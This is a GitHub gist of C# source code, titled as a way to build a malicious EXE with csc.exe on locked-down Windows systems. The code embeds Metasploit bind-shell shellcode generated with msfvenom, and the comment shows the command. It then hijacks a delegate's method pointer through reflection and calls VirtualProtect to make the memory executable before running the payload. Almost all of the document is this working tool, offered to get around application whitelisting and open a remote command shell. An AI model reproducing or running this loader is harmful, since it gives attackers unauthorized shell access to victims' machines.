Created
April 26, 2014 05:16
-
-
Save kost/11312346 to your computer and use it in GitHub Desktop.
Use .NET csc.exe to create a malicious EXE on locked down systems
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Reflection; | |
using System.Runtime.InteropServices; | |
namespace ExecASMHardcoded | |
{ | |
class Program | |
{ | |
[DllImport("kernel32.dll", SetLastError = true)] | |
static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect); | |
public delegate uint Ret1ArgDelegate(uint address); | |
static uint PlaceHolder1(uint arg1) { return 0; } | |
public static byte[] asmBytes = new byte[] | |
{ | |
//msfvenom -p windows/shell_bind_tcp -e none | sed -e ‘s/\"//ig’ | sed -e ‘s/+//ig’ | sed -e ‘s/\\x/,0x/ig’ | |
0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52, | |
0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26, | |
0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d, | |
0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0, | |
0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b, | |
0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff, | |
0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d, | |
0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, | |
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44, | |
0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b, | |
0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f, | |
0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29, | |
0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50, | |
0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x89,0xc7,0x31, | |
0xdb,0x53,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68, | |
0xc2,0xdb,0x37,0x67,0xff,0xd5,0x53,0x57,0x68,0xb7,0xe9,0x38,0xff,0xff, | |
0xd5,0x53,0x53,0x57,0x68,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x57,0x89,0xc7, | |
0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x68,0x63,0x6d,0x64,0x00,0x89,0xe3, | |
0x57,0x57,0x57,0x31,0xf6,0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44, | |
0x24,0x3c,0x01,0x01,0x8d,0x44,0x24,0x10,0xc6,0x00,0x44,0x54,0x50,0x56, | |
0x56,0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,0x68,0x79,0xcc,0x3f,0x86, | |
0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x08,0x87,0x1d,0x60, | |
0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5, | |
0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f, | |
0x6a,0x00,0x53,0xff,0xd5, | |
}; | |
unsafe static void Main(string[] args) | |
{ | |
fixed (byte* startAddress = &asmBytes[0]) // Take the address of our x86 code | |
{ | |
// Get the FieldInfo for "_methodPtr" | |
Type delType = typeof(Delegate); | |
FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic | | |
BindingFlags.Instance); | |
// Set our delegate to our x86 code | |
Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1); | |
_methodPtr.SetValue(del, (IntPtr) startAddress); | |
//Disable protection | |
uint outOldProtection; | |
VirtualProtect((IntPtr) startAddress, (uint) asmBytes.Length, 0x40, out outOldProtection); | |
// Enjoy | |
uint n = (uint)0x00000001; | |
n = del(n); | |
Console.WriteLine("{0:x}", n); | |
Console.ReadKey(); | |
} | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment